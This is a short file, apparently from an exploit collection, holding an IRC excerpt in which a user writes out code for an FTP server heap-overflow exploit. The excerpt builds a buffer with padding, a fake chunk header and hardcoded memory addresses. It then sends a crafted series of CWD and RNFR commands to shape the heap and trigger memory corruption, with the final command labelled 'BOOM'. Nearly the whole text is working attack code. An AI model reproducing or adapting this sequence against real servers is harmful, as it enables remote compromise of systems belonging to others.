exploits/7350wurm/doc/synnergy-method.txt


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

<dvorak> blaat.append('A', 96+32);               /* padding */
<dvorak> blaat.append(0xfffffff0);               /* the chunk */
<dvorak> blaat.append(-4);
<dvorak> blaat.append( 0x0806f7ac - 12 );
<dvorak> blaat.append( 0xbffffb49 );
<dvorak> conn.sendout("CWD %s\r\n", blaat.c_str());
<dvorak> conn.sendout("CWD %s\r\n", "~/{.,.,.,.}"); /*getting pointer on the heap */
<dvorak> conn.sendout("RNFR %s\r\n", "././././././././");    /* 24 */
<dvorak> conn.sendout("CWD %s\r\n", "AAAAsiz");  /* buidling size field */
<dvorak> conn.sendout("CWD %s\r\n", "AAAAsi");
<dvorak> conn.sendout("CWD %s\r\n", "AAAA\x69");
<dvorak> conn.sendout("RNFR .\r\n");             /* keeping it malloced */
<dvorak> conn.sendout("RNFR %s\r\n", "././././././././");    /* filling */
<dvorak> conn.sendout("CWD ~{\r\n"); /* BOOM */